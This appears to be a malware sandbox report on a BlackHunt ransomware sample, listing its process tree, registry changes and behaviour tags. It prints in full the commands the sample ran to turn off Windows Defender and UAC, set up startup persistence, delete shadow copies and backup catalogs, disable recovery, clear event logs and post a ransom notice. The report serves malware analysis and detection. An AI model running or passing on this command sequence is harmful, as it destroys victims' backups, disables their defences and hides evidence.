fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 123 PID 3256 wrote to memory of 2416 3256 cmd.exe 125 PID 3256 wrote to memory of 2416 3256 cmd.exe 125 PID 4536 wrote to memory of 1528 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 126 PID 4536 wrote to memory of 1528 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 126 PID 3392 wrote to memory of 4152 3392 cmd.exe 128 PID 3392 wrote to memory of 4152 3392 cmd.exe 128 PID 4536 wrote to memory of 4600 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 129 PID 4536 wrote to memory of 4600 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 129 PID 2400 wrote to memory of 4876 2400 cmd.exe 132 PID 2400 wrote to memory of 4876 2400 cmd.exe 132 PID 4536 wrote to memory of 2052 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 193 PID 4536 wrote to memory of 2052 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 193 PID 1528 wrote to memory of 4648 1528 cmd.exe 134 PID 1528 wrote to memory of 4648 1528 cmd.exe 134 PID 4536 wrote to memory of 2764 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 135 PID 4536 wrote to memory of 2764 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 135 PID 4536 wrote to memory of 2900 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 137 PID 4536 wrote to memory of 2900 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 137 PID 4600 wrote to memory of 1444 4600 cmd.exe 185 PID 4600 wrote to memory of 1444 4600 cmd.exe 185 PID 4536 wrote to memory of 116 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 140 PID 4536 wrote to memory of 116 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:5096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4368
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:8016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:10552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:6340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:8184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:9080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:9208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:11192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe" /F2⤵PID:2608
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe" /F3⤵
- Creates scheduled task(s)
PID:5912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1272
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1832
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1496
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:9240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2472
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5020
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:9352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4568
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:428
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4388
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2052
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7056
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:12932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6984
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5328
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7180
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:12876
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5964
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:14264
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:12840
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6408
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11288
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8216
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12272
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:6112
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:7224
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:9212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:7388
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:13756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:10444
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:11080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10516
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14248
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:13608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:9468
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:6752 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 14444⤵
- Program crash
PID:4960
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"2⤵PID:13988
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5332
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1444
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8332
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12776
-
